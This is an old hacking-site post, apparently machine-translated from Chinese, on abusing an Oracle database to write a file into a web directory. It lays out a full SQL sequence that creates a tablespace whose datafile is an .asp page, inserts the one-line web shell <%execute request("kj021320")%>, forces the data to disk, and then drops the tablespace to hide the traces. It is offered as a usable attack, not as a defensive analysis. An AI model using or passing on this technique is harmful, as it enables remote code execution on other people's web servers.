ORACLE to build the data file WriteWebShell-vulnerability warning-the black bar safety net

ID MYHACK58:62200820673
Type myhack58
Reporter 佚名
Modified 2008-10-14T00:00:00


In fact, similar to the ORACLE such a powerful database, really not necessary with this soil the way

SQLJ stored procedure write file can also be forced to helpless the other machine does not support SQLJ and UTL_FILE package is also to kill?

That you can also use the following I said this way

SQL> create tablespace kjtest datafile 'e:\website\kj.asp' size 100k nologging ;

Table space has been created.

Here remember the 100K for the ORACLE table space is the smallest unit, if you word the SHELL is relatively large it can be 200K conservative

However, the final recommended sentence must be the most concise

SQL> CREATE TABLE WEBSHELL(C varchar2(1 0 0)) tablespace kjtest;

The table has been created.

Generally with the VARCHAR type can already, the table space is too small, so can not be a CLOB or BLOB type.

SQL> insert into WEBSHELL values('<%execute request("kj021320")%>');

Has been created 1.

SQL> commit;

Submit completed.

Submit completion of after OK? NO~ because the data has not been DBWn process brush to a file. So the need to synchronize about CKPT as well as OFFLINE the current table space

SQL> alter tablespace kjtest offline;

Table space has changed.

To Here you saying the SHELL code has been written to that file.

You will find that there are such <%execute request("kj021320")%> code

The word shell has been OK.

Finally, use the PostScript to give it table space deletion

SQL> drop tablespace kjtest including contents;

Table space has been deleted.

Of course, this method disadvantage is that you have to know the WEB path